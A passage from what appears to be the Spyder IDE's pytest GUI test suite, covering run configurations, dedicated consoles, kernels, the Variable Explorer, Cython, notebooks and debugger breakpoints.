print('Shell content: ', shell._control.toPlainText(), '\n\n')
raise
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason='Fails on windows!')
def test_runconfig_workdir(main_window, qtbot, tmpdir):
"""Test runconfig workdir options."""
CONF.set('run', 'configurations', [])
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Use cwd for this file ---
rc = RunConfiguration().get()
rc['file_dir'] = False
rc['cw_dir'] = True
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in cwd after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == get_home_dir()
# --- Use fixed execution dir for test file ---
temp_dir = str(tmpdir.mkdir("test_dir"))
rc['file_dir'] = False
rc['cw_dir'] = False
rc['fixed_dir'] = True
rc['dir'] = temp_dir
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in fixed dir after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == temp_dir
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It's failing there")
def test_dedicated_consoles(main_window, qtbot):
"""Test running code in dedicated consoles."""
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Set run options for this file ---
rc = RunConfiguration().get()
# A dedicated console is used when these two options are False
rc['current'] = rc['systerm'] = False
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file and assert that we get a dedicated console ---
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
nsb = main_window.variableexplorer.get_focus_widget()
assert len(main_window.ipyconsole.get_clients()) == 2
assert main_window.ipyconsole.filenames == ['', test_file]
assert main_window.ipyconsole.tabwidget.tabText(1) == 'script.py/A'
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 4
# --- Assert only runfile text is present and there's no banner text ---
# See spyder-ide/spyder#5301.
text = control.toPlainText()
assert ('runfile' in text) and not ('Python' in text or 'IPython' in text)
# --- Clean namespace after re-execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('zz = -1')
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
assert not shell.is_defined('zz')
# --- Assert runfile text is present after reruns ---
assert 'runfile' in control.toPlainText()
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
def test_connection_to_external_kernel(main_window, qtbot):
"""Test that only Spyder kernels are connected to the Variable Explorer."""
# Test with a generic kernel
km, kc = start_new_kernel()
main_window.ipyconsole._create_client_for_kernel(kc.connection_file, None,
None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that there are no variables in the variable explorer
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 0
# Test with a kernel from Spyder
spykm, spykc = start_new_kernel(spykernel=True)
main_window.ipyconsole._create_client_for_kernel(spykc.connection_file, None,
None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that a variable is visible in the variable explorer
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 1
# Shutdown the kernels
spykm.stop_restarter()
km.stop_restarter()
spykm.shutdown_kernel(now=True)
km.shutdown_kernel(now=True)
spykc.stop_channels()
kc.stop_channels()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_change_types_in_varexp(main_window, qtbot):
"""Test that variable types can't be changed in the Variable Explorer."""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Try to change types
qtbot.keyClicks(QApplication.focusWidget(), "'s'")
qtbot.keyClick(QApplication.focusWidget(), Qt.Key_Enter)
qtbot.wait(1000)
# Assert object remains the same
assert shell.get_value('a') == 10
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_ipython_console(main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and File Explorer when
changing cwd in the IPython console.
"""
wdir = main_window.workingdirectory
treewidget = main_window.explorer.fileexplorer.treewidget
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp dir
temp_dir = to_text_string(tmpdir.mkdir(test_directory))
# Change directory in IPython console using %cd
with qtbot.waitSignal(shell.executed):
shell.execute(u"%cd {}".format(temp_dir))
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in explorer
assert osp.normpath(treewidget.get_current_folder()) == osp.normpath(
temp_dir)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_explorer(main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and IPython console when
changing directories in the File Explorer.
"""
wdir = main_window.workingdirectory
explorer = main_window.explorer
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp directory
temp_dir = to_text_string(tmpdir.mkdir(test_directory))
# Change directory in the explorer widget
explorer.chdir(temp_dir)
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in IPython console
assert osp.normpath(temp_dir) == osp.normpath(shell._cwd)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
(os.name == 'nt' or sys.platform == 'darwin' or
LooseVersion(ipy_release.version) == LooseVersion('7.11.0')),
reason="Hard to test on Windows and macOS and fails for IPython 7.11.0")
def test_run_cython_code(main_window, qtbot):
"""Test all the different ways we have to run Cython code"""
# ---- Setup ----
# Get a reference to the code editor widget
code_editor = main_window.editor.get_focus_widget()
# ---- Run pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_script.pyx'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# Wait until an object appears
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
assert shell.get_value('a') == 3628800
# Reset and close file
reset_run_code(qtbot, shell, code_editor, nsb)
main_window.editor.close_file()
# ---- Import pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_lib_import.py'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
assert shell.get_value('b') == 3628800
# Close file
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows.")
def test_open_notebooks_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that notebooks are open from the Project explorer."""
projects = main_window.projects
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Create an empty notebook in the project dir
nb = osp.join(LOCATION, 'notebook.ipynb')
shutil.copy(nb, osp.join(project_dir, 'notebook.ipynb'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select notebook in the project explorer
idx = projects.explorer.treewidget.get_index('notebook.ipynb')
projects.explorer.treewidget.setCurrentIndex(idx)
# Prese Enter there
qtbot.keyClick(projects.explorer.treewidget, Qt.Key_Enter)
# Assert that notebook was open
assert 'notebook.ipynb' in editorstack.get_current_filename()
# Convert notebook to a Python file
projects.explorer.treewidget.convert_notebook(osp.join(project_dir, 'notebook.ipynb'))
# Assert notebook was open
assert 'untitled' in editorstack.get_current_filename()
# Assert its contents are the expected ones
file_text = editorstack.get_current_editor().toPlainText()
if nbconvert.__version__ >= '5.4.0':
expected_text = ('#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:'
'\n\n\n1 + 1\n\n\n# In[ ]:\n\n\n\n\n')
else:
expected_text = '\n# coding: utf-8\n\n# In[1]:\n\n\n1 + 1\n\n\n'
assert file_text == expected_text
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runfile_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that file are run from the Project explorer."""
projects = main_window.projects
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Create an empty file in the project dir
test_file = osp.join(LOCATION, 'script.py')
shutil.copy(test_file, osp.join(project_dir, 'script.py'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select file in the project explorer
idx = projects.explorer.treewidget.get_index('script.py')
projects.explorer.treewidget.setCurrentIndex(idx)
# Press Enter there
qtbot.keyClick(projects.explorer.treewidget, Qt.Key_Enter)
# Assert that the file was open
assert 'script.py' in editorstack.get_current_filename()
# Run Python file
projects.explorer.treewidget.run([osp.join(project_dir, 'script.py')])
# Wait until the new console is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Wait until all objects have appeared in the variable explorer
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Check variables value
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_set_new_breakpoints(main_window, qtbot):
"""Test that new breakpoints are set in the IPython console."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
qtbot.wait(500)
# Verify that the breakpoint was set
shell.pdb_execute("b")
qtbot.wait(500)
assert "1 breakpoint keep yes at {}:6".format(test_file) in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_code(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run file ----
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run lines ----
# Run the whole file line by line
for _ in range(code_editor.blockCount()):
qtbot.keyClick(code_editor, Qt.Key_F9)
qtbot.wait(200)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell and advance ----
# Run the five cells present in file
# Add an unnamed cell at the top of the file
qtbot.keyClicks(code_editor, 'a = 10')
qtbot.keyClick(code_editor, Qt.Key_Return)
qtbot.keyClick(code_editor, Qt.Key_Up)
for _ in range(5):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the runcell function
assert 'runcell' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
control_text = shell._control.toPlainText()
# Rerun
shell.setFocus()
qtbot.keyClick(shell._control, Qt.Key_Up)
qtbot.wait(500)
qtbot.keyClick(shell._control, Qt.Key_Enter, modifier=Qt.ShiftModifier)
qtbot.wait(500)
code_editor.setFocus()
assert control_text != shell._control.toPlainText()
control_text = shell._control.toPlainText()[len(control_text):]
# Check for errors and the runcell function
assert 'runcell' in control_text
assert 'Error' not in control_text
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell ----
# Run the first cell in file
modifier = Qt.ControlModifier
if sys.platform == 'darwin':
modifier = Qt.MetaModifier
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
# Press Ctrl+Enter a second time to verify that we're *not* advancing
# to the next cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
assert nsb.editor.source_model.rowCount() == 1
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Debug cell ------
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClick(shell._control, 'c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Re-run last cell ----
# Run the first three cells in file
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
# Wait until objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 2,
timeout=EVAL_TIMEOUT)
# Clean namespace
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
# Wait until there are no objects in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0,
timeout=EVAL_TIMEOUT)
# Re-run last cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.AltModifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
assert shell.get_value('li') == [1, 2, 3]
# ---- Closing test file ----
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
@pytest.mark.parametrize('main_window',
[{'spy_config': ('editor', 'run_cell_copy', True)}],
indirect=True)
def test_run_cell_copy(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Make sure run_cell_copy is properly set
for editorstack in main_window.editor.editorstacks:
editorstack.set_run_cell_copy(True)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run cell and advance ----
# Run the three cells present in file
for _ in range(4):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the copied code
assert 'runcell' not in shell._control.toPlainText()
assert 'a = 10' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# ---- Closing test file and reset config ----
main_window.editor.close_file()
CONF.set('editor', 'run_cell_copy', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or os.environ.get('CI', None) is None or PYQT5,
reason="It times out sometimes on Windows, it's not "
"meant to be run outside of a CI and it segfaults "
"too frequently in PyQt5")
def test_open_files_in_new_editor_window(main_window, qtbot):
"""
This tests that opening files in a new editor window
is working as expected.
Test for spyder-ide/spyder#4085.
"""
# Set a timer to manipulate the open dialog while it's running
QTimer.singleShot(2000, lambda: open_file_in_editor(main_window,
'script.py',
directory=LOCATION))
# Create a new editor window
# Note: editor.load() uses the current editorstack by default
main_window.editor.create_new_window()
main_window.editor.load()
# Perform the test
# Note: There's always one file open in the Editor
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.get_stack_count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
def test_close_when_file_is_changed(main_window, qtbot):
"""Test closing spyder when there is a file with modifications open."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
editorstack = main_window.editor.get_current_editorstack()
editor = editorstack.get_current_editor()
editor.document().setModified(True)
# Wait for the segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_maximize_minimize_plugins(main_window, qtbot):
"""Test that the maximize button is working correctly."""
# Set focus to the Editor
main_window.editor.get_focus_widget().setFocus()
# Click the maximize button
max_action = main_window.maximize_action
max_button = main_window.main_toolbar.widgetForAction(max_action)
qtbot.mouseClick(max_button, Qt.LeftButton)
# Verify that the Editor is maximized
assert main_window.editor._ismaximized
# Verify that the action minimizes the plugin too
qtbot.mouseClick(max_button, Qt.LeftButton)
assert not main_window.editor._ismaximized
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif((os.name == 'nt' or
os.environ.get('CI', None) is not None and PYQT_VERSION >= '5.9'),
reason="It times out on Windows and segfaults in our CIs with PyQt >= 5.9")
def test_issue_4066(main_window, qtbot):
"""
Test for a segfault when these steps are followed:
1. Open an object present in the Variable Explorer (e.g. a list).
2. Delete that object in its corresponding console while its
editor is still opem.
3. Closing that editor by pressing its *Ok* button.
"""
# Create the object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('myobj = [1, 2, 3]')
# Open editor associated with that object and get a reference to it
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
obj_editor_id = list(nsb.editor.delegate._editors.keys())[0]
obj_editor = nsb.editor.delegate._editors[obj_editor_id]['editor']
# Move to the IPython console and delete that object
main_window.ipyconsole.get_focus_widget().setFocus()
with qtbot.waitSignal(shell.executed):
shell.execute('del myobj')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
# Close editor
ok_widget = obj_editor.btn_close
qtbot.mouseClick(ok_widget, Qt.LeftButton)
# Wait for the segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_varexp_edit_inline(main_window, qtbot):
"""
Test for errors when editing inline values in the Variable Explorer
and then moving to another plugin.
Note: Errors for this test don't appear related to it but instead they
are shown down the road. That's because they are generated by an
async C++ RuntimeError.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Change focus to IPython console
main_window.ipyconsole.get_focus_widget().setFocus()
# Wait for the error
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out sometimes on Windows and macOS")
def test_c_and_n_pdb_commands(main_window, qtbot):
"""Test that c and n Pdb commands update the Variable Explorer."""
nsb = main_window.variableexplorer.get_focus_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
qtbot.wait(500)
# Verify that c works
qtbot.keyClicks(control, 'c')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 1)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# Verify that n works
qtbot.keyClicks(control, 'n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 2)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# Verify that doesn't go to sitecustomize.py with next and stops
# the debugging session.
qtbot.keyClicks(control, 'n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClicks(control, 'n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 3)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClicks(control, 'n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClicks(control, 'n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClicks(control, 'n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: 'In [2]:' in control.toPlainText())
# Assert that the prompt appear
shell.clear_console()
assert 'In [2]:' in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_stop_dbg(main_window, qtbot):
"""Test that we correctly stop a debugging session."""
nsb = main_window.variableexplorer.get_focus_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Move to the next line
shell.pdb_execute("n")
qtbot.wait(1000)
# Stop debugging
stop_debug_action = main_window.debug_toolbar_actions[5]
stop_debug_button = main_window.debug_toolbar.widgetForAction(stop_debug_action)
qtbot.mouseClick(stop_debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Assert there are only two ipdb prompts in the console
assert shell._control.toPlainText().count('ipdb') == 2
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It only works on Linux")
def test_change_cwd_dbg(main_window, qtbot):
"""
Test that using the Working directory toolbar is working while debugging.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Set LOCATION as cwd
main_window.workingdirectory.chdir(tempfile.gettempdir())
qtbot.wait(1000)
print(repr(control.toPlainText()))
shell.clear_console()
qtbot.wait(500)
# Get cwd in console
qtbot.keyClicks(control, '!import os; os.getcwd()')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Assert cwd is the right one
assert tempfile.gettempdir() in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or PY2, reason="It times out sometimes")
def test_varexp_magic_dbg(main_window, qtbot):
